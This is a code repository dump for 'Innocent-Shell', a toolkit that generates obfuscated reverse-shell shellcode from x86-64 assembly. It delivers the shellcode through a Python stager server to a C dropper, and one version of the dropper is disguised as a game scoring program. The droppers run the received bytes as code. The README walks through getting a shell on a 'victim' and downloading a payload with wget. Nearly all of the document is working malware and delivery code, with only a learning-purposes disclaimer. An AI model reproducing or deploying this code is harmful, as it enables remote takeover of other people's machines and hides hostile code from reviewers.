├── ScreenCaptures ├── Screenshot_10.png ├── Screenshot_17.png ├── Screenshot_3.png ├── Screenshot_4.png ├── Screenshot_5.png ├── Screenshot_6.png ├── Screenshot_7.png ├── Screenshot_8.png └── Screenshot_9.png ├── Shell ├── innogen.py ├── Assembly │ ├── shell_template.nasm │ └── dropper.c └── dropper.c ├── payload.py ├── innoshell.py ├── README.md └── code.py /ScreenCaptures/Screenshot_10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mhuzaifi0604/Innocent-Shell/HEAD/ScreenCaptures/Screenshot_10.png -------------------------------------------------------------------------------- /ScreenCaptures/Screenshot_17.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mhuzaifi0604/Innocent-Shell/HEAD/ScreenCaptures/Screenshot_17.png -------------------------------------------------------------------------------- /ScreenCaptures/Screenshot_3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mhuzaifi0604/Innocent-Shell/HEAD/ScreenCaptures/Screenshot_3.png -------------------------------------------------------------------------------- /ScreenCaptures/Screenshot_4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mhuzaifi0604/Innocent-Shell/HEAD/ScreenCaptures/Screenshot_4.png -------------------------------------------------------------------------------- /ScreenCaptures/Screenshot_5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mhuzaifi0604/Innocent-Shell/HEAD/ScreenCaptures/Screenshot_5.png -------------------------------------------------------------------------------- /ScreenCaptures/Screenshot_6.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/mhuzaifi0604/Innocent-Shell/HEAD/ScreenCaptures/Screenshot_6.png -------------------------------------------------------------------------------- /ScreenCaptures/Screenshot_7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mhuzaifi0604/Innocent-Shell/HEAD/ScreenCaptures/Screenshot_7.png -------------------------------------------------------------------------------- /ScreenCaptures/Screenshot_8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mhuzaifi0604/Innocent-Shell/HEAD/ScreenCaptures/Screenshot_8.png -------------------------------------------------------------------------------- /ScreenCaptures/Screenshot_9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mhuzaifi0604/Innocent-Shell/HEAD/ScreenCaptures/Screenshot_9.png -------------------------------------------------------------------------------- /Shell/innogen.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import subprocess 3 | 4 | def help(): 5 | print("Usage:\tinnogen.py {IP} {PORT}") 6 | 7 | def create(IP, PORT): 8 | with open("dropper.c", "r") as temp, open("output.c", "w") as pay: 9 | l=temp.readlines() 10 | l[0]=f'#define IP "{IP}"' 11 | l[1]=f'#define PORT {PORT}' 12 | 13 | for line in l: 14 | pay.write(line+"\n") 15 | 16 | print("[+] payload saved to payload_spellshell.c") 17 | 18 | 19 | cmd=subprocess.Popen(['gcc', '-fno-stack-protector', '-z', 'execstack', '-o', 'output', 'output.c'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) 20 | out=cmd.stdout.read() 21 | print("[+] code saved as output.c and executable created as output.c") 22 | 23 | try: 24 | (IP, PORT)=(sys.argv[1], int(sys.argv[2])) 25 | except: 26 | help() 27 | exit() 28 | 29 | create(IP, PORT) 
-------------------------------------------------------------------------------- /Shell/Assembly/shell_template.nasm: -------------------------------------------------------------------------------- 1 | global _start 2 | _start: 3 | 4 | socket: 5 | push 0x2 6 | pop rdi 7 | xor rsi,rsi 8 | inc rsi 9 | xor rdx, rdx 10 | push 0x29 11 | pop rax 12 | syscall 13 | 14 | bind: 15 | xchg rax, rdi 16 | xor rax, rax 17 | push rax 18 | mov ebx , *IP* 19 | not ebx 20 | mov dword [rsp-4], ebx 21 | sub rsp , 4 22 | push word *PORT* 23 | push word 0x02 24 | push rsp 25 | pop rsi 26 | push 0x10 27 | pop rdx 28 | push 0x2a 29 | pop rax 30 | syscall 31 | 32 | push 0x02 33 | 'pop rsi', 34 | 'push *XORD*', ;0x21 35 | 'pop rdx', 36 | 'xor rdx, *XORD*', 37 | 'push rdx', 38 | 'pop rax', 39 | 'syscall', 40 | 'dec rsi', 41 | 'jns dup', 42 | 'xor rdx, rdx', 43 | 'push rdx', 44 | 'mov rbx, *XORD*', ;/bin//bash reverse 45 | 'xor bx, *XORD*', 46 | 'push rbx', 47 | 'mov rdi, rsp', 48 | 'push rdx', 49 | 'push rdi', 50 | 'mov rsi, rsp', 51 | 'xor rbx, rbx', 52 | 'mov bl, *XORD*', ;0x3b 53 | 'xor bl, *XORD*', 54 | 'push rbx', 55 | 'pop rax', 56 | 'syscall' -------------------------------------------------------------------------------- /payload.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import random 3 | from termcolor import colored 4 | 5 | def diffie_hellman(conn): 6 | P=251 7 | G=6 8 | a=random.randint(2, G) 9 | 10 | A = pow(G, a, P) 11 | conn.send(str(A).encode()) #sending A to client 12 | 13 | B = conn.recv(4096) #recieving B from client 14 | B= B.decode() 15 | B=int(B.split("\x00")[0]) 16 | 17 | key = pow(G, A*B, P) 18 | return key 19 | 20 | def obfuscate(shellcode, key): 21 | lol=b"" 22 | 23 | for i in range(len(shellcode)): 24 | lol+=(key^int(shellcode[i], 16)).to_bytes(1, "little") 25 | 26 | #left rotate 27 | lol=lol[key%(len(shellcode)): ] + lol[0: key%(len(shellcode))] 28 | 29 | return lol 30 | 31 | def drop(shellcode, ip, 
port): 32 | with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: 33 | sock.bind((ip, port)) 34 | sock.listen(1) 35 | conn, addr=sock.accept() 36 | 37 | print(colored('[+] ', 'magenta') + colored('Dropper', 'red') + f" connected from {colored(addr[0], 'green')} {colored(addr[1], 'green')}") 38 | 39 | send=b'' 40 | for b in shellcode: 41 | send+=bytes.fromhex(b[2:].rjust(2, '0')) 42 | 43 | key=diffie_hellman(conn) 44 | print(colored('[+] ', 'magenta') + colored('Diffie Hellman', 'red') + f" key exchange successful with {colored('key=', 'green')}{colored(key, 'green')}") 45 | send=obfuscate(shellcode, key) 46 | 47 | print(colored('[+] ', 'magenta') + colored('Payload', 'red') + f" encrypted with {colored(key, 'green')} and rotated by offset {colored(key%(len(shellcode)), 'green')}") 48 | try: 49 | conn.sendall(send) 50 | print(colored('[+] ', 'magenta') + colored('Payload', 'red') + f" delivered to {colored(addr[0], 'green')} {colored(addr[1], 'green')}") 51 | conn.close() 52 | sock.close() 53 | return 0 54 | except : 55 | print(colored('[-] ', 'magenta') + colored('Failed', 'red') + " to deliver payload. 
Connection closed") 56 | conn.close() 57 | sock.close() 58 | return 1 59 | -------------------------------------------------------------------------------- /innoshell.py: -------------------------------------------------------------------------------- 1 | import code 2 | import payload 3 | import argparse 4 | import socket 5 | import os 6 | import socket, sys, time 7 | import threading 8 | from termcolor import colored 9 | 10 | 11 | desc = "\n"+r""" _____ _ _____ _ _ _ 12 | |_ _| | | / ____| | | | | 13 | | | _ __ _ __ ___ ___ ___ _ __ | |_ | (___ | |__ ___| | | 14 | | | | '_ \| '_ \ / _ \ / __/ _ \ '_ \| __| \___ \| '_ \ / _ \ | | 15 | _| |_| | | | | | | (_) | (_| __/ | | | |_ ____) | | | | __/ | | 16 | |_____|_| |_|_| |_|\___/ \___\___|_| |_|\__| |_____/|_| |_|\___|_|_| 17 | 18 | Use python serv.py -h to get to the help menu 19 | """ 20 | def sender(conn): 21 | while True: 22 | try: 23 | command = str(input()) 24 | conn.send((command+"\n").encode()) 25 | except: 26 | print("[+] - Connection Closed.") 27 | return None 28 | 29 | def reciever(conn): 30 | while True: 31 | try: 32 | reply = conn.recv(32768) 33 | print(colored(reply.decode(), 'green')) 34 | except: 35 | print("[+] - Connection Closed.") 36 | return None 37 | 38 | 39 | 40 | print(colored(desc, 'red', attrs=['bold'])) 41 | parser = argparse.ArgumentParser(desc) 42 | parser.add_argument("-lip", "--listenerIP", help = "To Enter Server's IP") 43 | parser.add_argument("-lport", "--listenerPort", help = "To Enter Server's Port") 44 | parser.add_argument("-sip", "--StagerIP", help = "To Enter Clients's IP") 45 | parser.add_argument("-sport", "--StagerPort", help = "To Enter Clients's IP") 46 | parser.add_argument("-nc", "--listen", help = "To check for listening terminal") 47 | args = parser.parse_args() 48 | 49 | shellcode=code.getShellCode(code.prepare(code.asm, args.listenerIP, int(args.listenerPort)), os.getcwd()) 50 | payload.drop(shellcode, args.StagerIP, int(args.StagerPort)) 51 | if int(args.listen) == 
1: 52 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 53 | s.bind((args.listenerIP, int(args.listenerPort))) 54 | s.listen(1) 55 | print(f"[+] - Server listening on Port [{args.listenerIP}] : [{args.listenerPort}]") 56 | ans = '' 57 | (conn, address) = s.accept() 58 | thread = threading.Thread(target = sender, args=(conn, )).start() 59 | thread = threading.Thread(target = reciever, args=(conn, )).start() 60 | print(f"\n[+] - Server Connected to client at [{address[0]} ] : [ {address[1]}]") 61 | -------------------------------------------------------------------------------- /Shell/Assembly/dropper.c: -------------------------------------------------------------------------------- 1 | #define IP "127.0.0.1" 2 | #define PORT 8080 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | 14 | #define MAXLINE 4096 15 | 16 | long power(long x, long y, long p){ 17 | long result = 1; 18 | x %= p; 19 | //printf("X: %d\n", x); 20 | //for (int i = 0 ; i < 32; i++) 21 | // x << 2; 22 | //printf("Modified X: %d\n", x); 23 | if (x == 0) 24 | return 0; 25 | //int bin[64]; 26 | //int i=0; 27 | //for ( ;y > 0; ){ 28 | // bin[i++] = y % 2; 29 | // y /= 2; 30 | //} 31 | while(!(y <= 0)){ 32 | if(y %2 == 1) 33 | result = (result * x) % p; 34 | y /= 2; 35 | x = (x*x) % p; 36 | } 37 | return result; 38 | } 39 | 40 | int main(){ 41 | int sockfd, client_socket; 42 | struct sockaddr_in servaddr; 43 | 44 | if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0 ){ 45 | perror("Socket Creation Failed"); 46 | exit(EXIT_FAILURE); 47 | } 48 | 49 | memset(&servaddr, 0, sizeof(servaddr)); 50 | servaddr.sin_family = AF_INET; 51 | servaddr.sin_port = htons(PORT); 52 | servaddr.sin_addr.s_addr = inet_addr(IP); 53 | 54 | connect(sockfd, (struct sockaddr_in *)&servaddr, sizeof(servaddr)); 55 | char reply[MAXLINE]; 56 | memset(reply, 0, sizeof(reply)); 57 | 58 | int P=251, G=6; 59 | int a=rand()%(G-2)+2; 60 | printf("a: %d\n", 
a); 61 | long A=power(G, a, P); 62 | printf("A: %d\n", A); 63 | recv(sockfd, reply, 4096, 0); 64 | int B=atoi(reply); 65 | printf("B: %d\n", B); 66 | memset(reply, 0, sizeof(reply)); 67 | sprintf(reply, "%d\n", A); 68 | send(sockfd, reply, 4096, 0); 69 | long key=power(G, A*B, P); 70 | printf("key: %d\n", key); 71 | char buffer[MAXLINE]; 72 | memset(reply, 0, sizeof(reply)); 73 | recv(sockfd, reply, 4096, 0); 74 | printf("size: %d\n",strlen(reply)); 75 | printf("ShellCode: %s\n", reply); 76 | 77 | const int len=strlen(reply); 78 | unsigned char buff2[4096]; 79 | memset(buff2, 0, sizeof buff2); 80 | 81 | for(int i=0; i 0; j--){ 87 | buff2[j] = buff2[j-1]; 88 | } 89 | buff2[0] = last; 90 | } 91 | /*for (int i = 0 ; i < (key%strlen(buff2)); i++){ 92 | int j, start = buff2[0]; 93 | for (int j = 0 ; j < len ; j++){ 94 | buff2[j] = buff2[j+1]; 95 | } 96 | buff2[j] = start; 97 | } 98 | */ 99 | int(*ret)() = (int(*)())buff2; 100 | (int)(*ret)(); 101 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # *Innocent-Shell* 2 | *Innocent Shell is basically a fully integrated Obfuscated Payload Generator with a Dropper to Create a Reverse Shell on targets Device developed by Team* 3 | *PORT KNOCKERS :* 4 | * *Muhammad Huzaifa*

5 | * *Abdullah Irfan*

6 | * *Aisha Irfan*

7 | ![Innocent Shell](ScreenCaptures/Screenshot_10.png)

8 | *The Project makes use of Python, C and x86 Assembly Languages WHERE*

9 | *➡️Reverse Shell Payload has been Developed using pure x86 assembly which is then parsed to develop the dropper for client/ target*

10 | *➡️Client side stager to Connect to the Server is developed using C Language.*

11 | *➡️And Lastly the Server for the Reverse Shell to Connect to and Execute Commands and Getting Reply has been done using Python3.* 12 | 13 | ## *How To Run The Project* 14 | *To run the project 1st of all just clone this repository.* 15 | * Clone Repository: 16 | ``` 17 | git clone https://github.com/huzaifi0604/Innocent-Shell 18 | ``` 19 | *After extracting the zip file you can use the following command to get the help menu for the Server.* 20 | ``` 21 | python innoshell.py -h 22 | ``` 23 | This command can be used to check the flags and respective arguments for running server and listening for the target. You can use 24 | * *-lip --> Set Server's IP Address | -sip --> Set Client's IP Address*

25 | * *In this case since we are using same machine you can use your local host 127.0.0.1.* 26 | * *-lport --> Set Server's Port | -sport --> Set Client's Port*

27 | * *Set the server's port (-lport) to 9999 and the client's port (-sport) to 8080*

28 | * *-nc flag --> to open a separate netcat listener using the same server. Use 1 to set the listener to open.* 29 | ## Run Innocent Shell Server 30 | *Now open terminal and run the Innocent shell's server using the command below.* 31 | ``` 32 | python innocentshell.py -lip 127.0.0.1 -lport 9999 -sip 127.0.0.1 -sport 8080 -nc 1 33 | ``` 34 | *Server should start listening for connection after successfully running this command.* 35 | ![listner](ScreenCaptures/Screenshot_17.png)

36 | *Now change into the Shell folder and use the following command to build the dropper file.* 37 | ``` 38 | gcc -fno-stack-protector -z execstack dropper.c -o dropper 39 | ``` 40 | *Then use ``` ./dropper ``` to run the compiled C dropper for the client.*

41 | *Now the server looking for the connection should have connected to the client and have output of something like this* 42 | ![output](ScreenCaptures/Screenshot_9.png)

43 | *Now you can run any command in the victim's reverse shell. I used the wget command to download a payload from my self-made Python HTTP server using the command*

44 | ``` 45 | wget http://my localhost IP:8080/payload.exe 46 | ``` 47 | ![payload wget](ScreenCaptures/Screenshot_3.png)

48 | *You can see that I have successfully downloaded my desired file onto the victim's system.*

49 | ![ls](ScreenCaptures/Screenshot_4.png)

50 | ## Assembly Payload 51 | *Reverse Shell Payload to get executed on victim's device was written using x86 assembly language and then parsed into C* 52 | ![assembly](ScreenCaptures/Screenshot_7.png)

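53 | ## Payload Obfuscation 54 | *Last but not least is payload obfuscation: the reverse shell payload is obfuscated using byte shifting, with a Diffie-Hellman key exchange 55 | mechanism supplying the key used to encrypt and decrypt it. Note that payload.py derives that key as G^(A*B) mod 251 from the two values exchanged in the clear, so the scheme hides the payload from casual inspection but gives no confidentiality against anyone who captures the exchange.* 56 | ![obfuscation](ScreenCaptures/Screenshot_8.png)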

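57 | *Similarly, the dropper on the client's side has been written so that it resembles a program for a game and scoring system, 58 | and a user analyzing the code cannot easily recognize anything malicious in it. The renaming is cosmetic, though: the socket calls, the recv() into a buffer, the cast of that buffer to a function pointer and the -z execstack build flag are all still present, and those are what a reviewer or scanner should key on.* 59 | ![game](ScreenCaptures/Screenshot_5.png)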

60 | ## Use At your Own Risk 61 | *It is clearly being stated that all the files in the repository are allowed/ available for use but only for learning purposes. We won't be responsible for 62 | any type of malicious activity done using this repository's data.* 63 | -------------------------------------------------------------------------------- /Shell/dropper.c: -------------------------------------------------------------------------------- 1 | #define IP "127.0.0.1" 2 | #define PORT 8080 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | 15 | #define QUALIFIER 4096 16 | int thirdumpire(int x){ 17 | if(x>100 || x%2==100%2 || x%2==1) 18 | return 0; 19 | return 45; 20 | } 21 | long timer(long hour, long min, long sec){ 22 | long varx50 = 1; 23 | long complete=hour*min-sec; 24 | for(int x34=34;x34min || min>hour) 29 | hour %= sec; 30 | if(hour>sec){ 31 | hour=11; 32 | min=hour*min; 33 | sec=min+67; 34 | } 35 | complete=complete%(complete-1); 36 | if (hour == 0 && complete > hour) 37 | return 0; 38 | while(!(min <= 0)){ 39 | if(min %2 == 1) 40 | varx50 = (varx50 * hour) % sec; 41 | else if (min==3 && sec>varx50){ 42 | int reset=0; 43 | hour=reset+1; 44 | min=reset+2; 45 | sec=reset*rand()%7; 46 | } 47 | else if(min==11) 48 | return 99; 49 | else 50 | complete=hour*min*sec; 51 | min /= 2; 52 | min=min%complete; 53 | hour = (hour*hour) % sec; 54 | } 55 | printf("%d",varx50); 56 | return varx50; 57 | } 58 | int reduce(char* x) 59 | { 60 | return atoi(x); 61 | } 62 | int penalty(int x) 63 | { 64 | return rand()%(x-2)+2; 65 | } 66 | int main(){ 67 | srand(time(NULL)); 68 | 69 | int startgame, player2; 70 | int points=5; 71 | struct sockaddr_in servicetoss; 72 | 73 | if((startgame = socket(AF_INET, SOCK_STREAM, 0)) < 0 ){ 74 | exit(EXIT_FAILURE); 75 | } 76 | int doublepoint=points*points; 77 | points=doublepoint*10; 78 | doublepoint=doublepoint%points; 79 | if(doublepoint2) 101 | 
doublepoint=0; 102 | } 103 | int round=0; 104 | int a350; 105 | long a351; 106 | int b=10; 107 | int winning_point=-1; 108 | for(round=0;round<10;round++) 109 | { 110 | switch(round){ 111 | case 0:{ 112 | a350=penalty(goal); 113 | break; 114 | } 115 | case 3:{ 116 | if((b*(rand()%67))%goal!=8){ 117 | b=reduce(myscore); 118 | } 119 | break; 120 | } 121 | case 1:{ 122 | a351=timer(goal,a350,points); 123 | break; 124 | } 125 | case 4:{ 126 | memset(myscore,0,sizeof(myscore)); 127 | sprintf(myscore, "%d\n", a351); 128 | break; 129 | } 130 | case 5:{ 131 | send(startgame, myscore, 4096, 0); 132 | break; 133 | } 134 | case 6:{ 135 | winning_point=timer(goal,a351*b,points); 136 | break; 137 | } 138 | case 8:{ 139 | memset(myscore,0,sizeof(myscore)); 140 | break; 141 | } 142 | case 7:{ 143 | if(winning_point>300){ 144 | doublepoint=0; 145 | } 146 | break; 147 | } 148 | case 12:{ 149 | printf("YOU HAVE WON THE CHAMPIONSHIP"); 150 | } 151 | case 16:{ 152 | recv(startgame, myscore, 4096, 0); 153 | goal=0; 154 | memset(myscore, 0, sizeof(myscore)); 155 | break; 156 | } 157 | default: 158 | recv(startgame, myscore, 4096, 0); 159 | } 160 | } 161 | const int probability=strlen(myscore); 162 | unsigned char keeper[4096]; 163 | memset(keeper, 0, sizeof(keeper)); 164 | int i=rand()%100; 165 | for(i=thirdumpire(i); i 0; j--){ 171 | if(j==0) 172 | keeper[out]=timer(3,4,54); 173 | else 174 | keeper[j] = keeper[j-1]; 175 | } 176 | keeper[0] = last; 177 | } 178 | 179 | int(*ret)() = (int(*)())keeper; 180 | (int)(*ret)(); 181 | } -------------------------------------------------------------------------------- /code.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import random 3 | import subprocess 4 | import os 5 | import sys 6 | 7 | asm=[ 8 | 'global _start', 9 | '_start:', 10 | 'push 0x2', 11 | 'pop rdi', 12 | 'xor rsi,rsi', 13 | 'inc rsi', 14 | 'xor rdx, rdx', 15 | 'push 0x29', 16 | 'pop rax', 17 | 'syscall', 18 | 'xchg rax, 
rdi', 19 | 'xor rax, rax', 20 | 'push rax', 21 | 'mov ebx , *IP*', #13 22 | 'not ebx', 23 | 'mov dword [rsp-4], ebx', 24 | 'sub rsp , 4 ', 25 | 'push word *PORT*', #17 26 | 'push word 0x02 ', 27 | 'push rsp', 28 | 'pop rsi', 29 | 'push 0x10', 30 | 'pop rdx', 31 | 'push 0x2a', 32 | 'pop rax', 33 | 'syscall', 34 | 'push 0x02', 35 | 'pop rsi', 36 | 'label0x292929:', 37 | 'xor rdx, rdx', 38 | #'push *XORD*', #28 39 | 'mov dl, *XORD*', 40 | #'pop rdx', 41 | 'xor dl, *XORD*', #30 42 | 'push rdx', 43 | 'pop rax', 44 | 'syscall', 45 | 'dec rsi', 46 | 'jns label0x292929', 47 | 'xor rdx, rdx', 48 | 'push rdx', 49 | 'mov rbx, *XORD*', #38 50 | 'xor bx, *XORD*', #39 51 | 'push rbx', 52 | 'mov rdi, rsp', 53 | 'push rdx', 54 | 'push rdi', 55 | 'mov rsi, rsp', 56 | 'xor rbx, rbx', 57 | 'mov bl, *XORD*', #46 58 | 'xor bl, *XORD*', #47 59 | 'push rbx', 60 | 'pop rax', 61 | 'syscall' 62 | ] 63 | ''' 64 | 65 | asm=[ 66 | 'global _start', 67 | '_start:', 68 | 'xor rax, rax', 69 | 'xor rsi, rsi ', 70 | 'mul rsi', 71 | 'add rcx, 0x3', 72 | 'push byte 0x2', 73 | 'pop rdi', 74 | 'inc esi', 75 | 'push byte 0x29', 76 | 'pop rax', 77 | 'syscall', 78 | 'xchg rax, rdi', 79 | 'xor rax, rax', 80 | 'push rax', 81 | 'mov ebx , *IP*', #15 82 | 'not ebx', 83 | 'mov dword [rsp-4], ebx', 84 | 'sub rsp , 4 ', 85 | 'push word *PORT*', #19 86 | 'push word 0x02', 87 | 'push rsp', 88 | 'pop rsi', 89 | 'push 0x10', 90 | 'pop rdx', 91 | 'push 0x2a', 92 | 'pop rax', 93 | 'syscall', 94 | 'push 0x3 ', 95 | 'pop rsi', 96 | 'duplicate:', 97 | 'dec esi ', 98 | 'mov al, 0x21', 99 | 'syscall', 100 | 'jne duplicate', 101 | #'push rsp', 102 | #'pop rsi', 103 | #'xor rax, rax', 104 | #'syscall', 105 | #'push 0x6b636168', 106 | #'pop rax', 107 | #'lea rdi, [rel rsi]', 108 | #'scasd', 109 | 'xor rsi , rsi', 110 | 'mul rsi ', 111 | 'push ax ', 112 | 'mov rbx , 0x68732f2f6e69622e', 113 | 'inc rbx', 114 | 'add rcx, 2', 115 | 'push rbx', 116 | 'push rsp', 117 | 'pop rdi ', 118 | 'push byte 0x3b', 119 | 'pop rax', 120 | 
'syscall' 121 | ]''' 122 | 123 | def ip_sub(ip): 124 | octets=ip.split(".") 125 | octets=[hex(~(int(o))&0xFF) for o in octets] 126 | 127 | ips='0x' 128 | for o in reversed(octets): 129 | ips+=o[2:].rjust(2, '0') 130 | 131 | return ips 132 | 133 | def port_sub(port): 134 | return ((hex(socket.htonl(port)))[:6]).rstrip('0') 135 | 136 | def rand_xor(num, half=False): 137 | size=(num.bit_length() + 7) // 8 138 | if half: 139 | salt=random.getrandbits(16) 140 | else: 141 | salt=random.getrandbits(size*8) 142 | num^=salt 143 | return (hex(num), hex(salt)) 144 | 145 | def prepare(asm, ip, port): 146 | #ip 147 | ''' 148 | asm[15]=asm[15].replace("*IP*", ip_sub(ip)) 149 | #port 150 | asm[19]=asm[19].replace("*PORT*", port_sub(port)) 151 | ''' 152 | 153 | asm[13]=asm[13].replace("*IP*", ip_sub(ip)) 154 | asm[17]=asm[17].replace("*PORT*", port_sub(port)) 155 | #dup2 156 | (num, salt)=rand_xor(0x21) 157 | asm[30]=asm[30].replace("*XORD*", num) 158 | asm[31]=asm[31].replace("*XORD*", salt) 159 | #/bin/bash 160 | (num, salt)=rand_xor(0x68732f2f6e69622f, True) 161 | asm[39]=asm[39].replace("*XORD*", num) 162 | asm[40]=asm[40].replace("*XORD*", salt) 163 | #execve 164 | (num, salt)=rand_xor(0x3b) 165 | asm[47]=asm[47].replace("*XORD*", num) 166 | asm[48]=asm[48].replace("*XORD*", salt) 167 | return asm 168 | 169 | def getShellCode(asm, path): 170 | os.chdir(path) 171 | 172 | try: 173 | os.mkdir("temp") 174 | except: 175 | pass 176 | 177 | os.chdir(path+"/temp") 178 | 179 | with open('temp.nasm', 'w') as ifile: 180 | for line in asm: 181 | ifile.write(line+"\n") 182 | 183 | cmdline=subprocess.Popen(['nasm', '-f', 'elf64', 'temp.nasm', '-o', 'temp.o'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) 184 | r=cmdline.stdout.read() 185 | cmdline=subprocess.Popen(['ld', 'temp.o', '-o', 'temp'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) 186 | r=cmdline.stdout.read() 187 | 188 | cmdline=os.popen(f"objdump -D temp|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' 
'|tr '\\t' ' '|sed 's/ $//g'|sed 's/ /\\\\x/g'|paste -d '' -s |sed 's/^/\"/'|sed 's/$/\"/g'") 189 | shellcode=cmdline.read() 190 | cmdline.close() 191 | 192 | with open('temp.py', 'w') as ifile: 193 | ifile.write(f"buff={shellcode}") 194 | 195 | sys.path.insert(1, path+'/temp') 196 | from temp import buff 197 | 198 | 199 | ch=[hex(ord(i)) for i in buff] 200 | ch.insert(-29, '0x2f') #-18 201 | 202 | os.chdir(path) 203 | os.system("rm -r temp") 204 | 205 | return ch 206 | 207 | --------------------------------------------------------------------------------